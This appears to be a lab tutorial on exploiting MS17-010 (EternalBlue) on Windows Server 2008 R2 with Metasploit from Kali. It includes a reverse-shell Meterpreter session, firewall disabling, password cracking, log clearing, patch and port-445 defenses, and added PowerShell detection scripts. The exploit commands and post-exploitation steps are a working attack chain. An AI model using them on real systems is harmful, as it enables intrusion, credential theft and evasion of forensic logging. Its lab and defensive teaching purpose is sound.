Exploiting MS17-010 from Kali
Lab environment
Target: Windows Server 2008 R2 with port 445 open (the Windows firewall does not need to be turned off).
Attacker: Kali, using the Metasploit Framework with a Meterpreter payload against the MS17-010 EternalBlue vulnerability.
Procedure
1) First use Nmap to check whether port 445 is open on the target.
2) Start msfconsole on Kali.
3) Scan the target for the vulnerability.
4) Exploit the target with MS17-010.
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue // switch to the exploit module
msf5 exploit(windows/smb/ms17_010_eternalblue) >
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp // use a reverse-connection payload so the target connects back to Kali
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) >
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.10.129 // target IP address
rhost => 192.168.10.129
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.10.128 // Kali IP address
lhost => 192.168.10.128
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit // launch the attack
[*] Started reverse TCP handler on 192.168.10.128:4444
[*] 192.168.10.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.10.129:445 - Host is likely VULNERABLE to MS17-010! - Windows Web Server 2008 R2 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.10.129:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.10.129:445 - Connecting to target for exploitation.
[+] 192.168.10.129:445 - Connection established for exploitation.
[+] 192.168.10.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.10.129:445 - CORE raw buffer dump (46 bytes)
[*] 192.168.10.129:445 - 0x00000000 57 69 6e 64 6f 77 73 20 57 65 62 20 53 65 72 76 Windows Web Serv
[*] 192.168.10.129:445 - 0x00000010 65 72 20 32 30 30 38 20 52 32 20 37 36 30 31 20 er 2008 R2 7601
[*] 192.168.10.129:445 - 0x00000020 53 65 72 76 69 63 65 20 50 61 63 6b 20 31 Service Pack 1
[+] 192.168.10.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.10.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.10.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.10.129:445 - Starting non-paged pool grooming
[+] 192.168.10.129:445 - Sending SMBv2 buffers
[+] 192.168.10.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.10.129:445 - Sending final SMBv2 buffers.
[*] 192.168.10.129:445 - Sending last fragment of exploit packet!
[*] 192.168.10.129:445 - Receiving response from exploit packet
[+] 192.168.10.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.10.129:445 - Sending egg to corrupted connection.
[*] 192.168.10.129:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 192.168.10.129
[*] Meterpreter session 1 opened (192.168.10.128:4444 -> 192.168.10.129:49159) at 2020-11-27 12:06:37 +0800
[+] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > // Exploit succeeded; the target can now be controlled
5) List the files in the target's C: drive
6) Download files
7) Crack user passwords
The hashes can be cracked at www.cmd5.com.
8) Log in to the target over Remote Desktop
root@KALI:~# rdesktop -u administrator -p abc123 192.168.10.129:3389
9) Take a screenshot
10) Turn off the firewall
meterpreter > shell // enter the target's command prompt
Process 2848 created.
Channel 4 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\>
C:\>netsh advfirewall set allprofiles state off // turn off the target's firewall
netsh advfirewall set allprofiles state off
确定。
C:\>
11) Clear the event logs
Before clearing, all event logs can be seen on the target.
Clear the log entries from Kali.
Checking the target again, only a single record remains: the one recording that the log was cleared.
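From the defender's side, the run above shows that clearing the logs is itself logged: the one record left behind is the clear event. The following PowerShell script, an added example that is not part of the original post, lists those records on a Windows host. It relies on two facts: the Security log records a clear as Event ID 1102 and the System/Application logs record one as Event ID 104, both from the Microsoft-Windows-Eventlog provider; the ComputerName and HoursBack parameters are assumptions made for this example.

```powershell
# Added example (not from the original post). Lists log-clear events, the trace
# that survives after an attacker wipes the logs from a Meterpreter session.
# Works with PowerShell 2.0 on Server 2008 R2; ComputerName/HoursBack are assumed.
param(
    [string]$ComputerName = $env:COMPUTERNAME,
    [int]$HoursBack = 24
)

$since = (Get-Date).AddHours(-$HoursBack)

# Event ID 1102: "The audit log was cleared" (Security log).
$securityClears = Get-WinEvent -ComputerName $ComputerName -FilterHashtable @{
    LogName      = 'Security'
    ProviderName = 'Microsoft-Windows-Eventlog'
    Id           = 1102
    StartTime    = $since
} -ErrorAction SilentlyContinue

# Event ID 104: "The log file was cleared" (System and Application logs).
$otherClears = Get-WinEvent -ComputerName $ComputerName -FilterHashtable @{
    LogName      = @('System', 'Application')
    ProviderName = 'Microsoft-Windows-Eventlog'
    Id           = 104
    StartTime    = $since
} -ErrorAction SilentlyContinue

$hits = @($securityClears) + @($otherClears) | Where-Object { $_ -ne $null }

if (-not $hits) {
    Write-Output "No log-clear events on $ComputerName in the last $HoursBack hours."
    return
}

# The full message names the account that cleared the log; compare the timestamp
# with the session time msfconsole printed when the target was compromised.
$hits | Sort-Object TimeCreated | ForEach-Object {
    New-Object PSObject -Property @{
        Time    = $_.TimeCreated
        Log     = $_.LogName
        EventId = $_.Id
        Message = ($_.Message -split "`r?`n")[0]
    }
} | Select-Object Time, Log, EventId, Message | Format-Table -AutoSize
```

Forwarding these two event IDs to a central collector is what makes the clear visible even when the attacker also wipes the local copy.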
Defending against MS17-010
1) Apply the patches
KB976932 (SP1), KB4012212, KB4012215
2) Use the system firewall's advanced settings to block connections to port 445
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.10.128:4444
[*] 192.168.10.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.10.129:445 - Host is likely VULNERABLE to MS17-010! - Windows Web Server 2008 R2 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.10.129:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.10.129:445 - Connecting to target for exploitation.
[+] 192.168.10.129:445 - Connection established for exploitation.
[+] 192.168.10.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.10.129:445 - CORE raw buffer dump (46 bytes)
[*] 192.168.10.129:445 - 0x00000000 57 69 6e 64 6f 77 73 20 57 65 62 20 53 65 72 76 Windows Web Serv
[*] 192.168.10.129:445 - 0x00000010 65 72 20 32 30 30 38 20 52 32 20 37 36 30 31 20 er 2008 R2 7601
[*] 192.168.10.129:445 - 0x00000020 53 65 72 76 69 63 65 20 50 61 63 6b 20 31 Service Pack 1
[+] 192.168.10.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.10.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.10.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.10.129:445 - Starting non-paged pool grooming
[+] 192.168.10.129:445 - Sending SMBv2 buffers
[+] 192.168.10.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.10.129:445 - Sending final SMBv2 buffers.
[*] 192.168.10.129:445 - Sending last fragment of exploit packet!
[*] 192.168.10.129:445 - Receiving response from exploit packet
[+] 192.168.10.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.10.129:445 - Sending egg to corrupted connection.
[*] 192.168.10.129:445 - Triggering free of corrupted buffer.
[-] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.10.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
msf5 exploit(windows/smb/ms17_010_eternalblue) >
As you can see, the connection failed!
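To check the two defenses listed above on the host itself, here is an added PowerShell script that is not from the original post. The KB numbers are the ones the post lists; the firewall rule name, the use of netsh (the NetSecurity cmdlets do not exist on Server 2008 R2) and the reliance on netsh's exit code to detect a missing rule are assumptions made for this example.

```powershell
# Added example (not from the original post). Verifies the two MS17-010 defenses
# from the list above on Windows 7 / Server 2008 R2. Run from an elevated prompt.

# 1) Patches. KB976932 is SP1; KB4012212 (security-only) and KB4012215 (monthly
#    rollup) each contain the MS17-010 fix, so one of the two is enough. Note that
#    Get-HotFix lists only the KB that was installed: a later cumulative rollup
#    supersedes both March 2017 packages without showing their numbers.
$installed = Get-HotFix | Select-Object -ExpandProperty HotFixID
foreach ($kb in 'KB976932', 'KB4012212', 'KB4012215') {
    if ($installed -contains $kb) { Write-Output "[+] $kb installed" } else { Write-Output "[-] $kb not found" }
}
if (-not ($installed -contains 'KB4012212' -or $installed -contains 'KB4012215')) {
    Write-Output "[!] Neither MS17-010 package is listed; confirm a newer rollup is installed."
}

# 2) Firewall. Block inbound TCP 445 on every profile. netsh is used because the
#    NetSecurity cmdlets are not available on 2008 R2; the rule name is assumed.
$ruleName = 'BlockInboundSMB445'
netsh advfirewall firewall show rule name=$ruleName | Out-Null
if ($LASTEXITCODE -ne 0) {   # assumption: netsh exits non-zero when no rule matches
    netsh advfirewall firewall add rule name=$ruleName dir=in action=block protocol=TCP localport=445 profile=any | Out-Null
    Write-Output "[+] Added firewall rule $ruleName"
} else {
    Write-Output "[=] Firewall rule $ruleName already present"
}

# The rule does nothing while the firewall is off (step 10 above disabled it).
# EnableFirewall under these keys is what 'netsh advfirewall set ... state' toggles;
# reading the registry avoids parsing localized netsh output.
$base = 'HKLM:\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy'
foreach ($prof in 'DomainProfile', 'StandardProfile', 'PublicProfile') {
    $p = Get-ItemProperty -Path "$base\$prof" -Name EnableFirewall -ErrorAction SilentlyContinue
    if ($p -eq $null -or $p.EnableFirewall -ne 1) {
        Write-Output "[-] $prof firewall is OFF; re-enable with: netsh advfirewall set allprofiles state on"
    } else {
        Write-Output "[+] $prof firewall is on"
    }
}
```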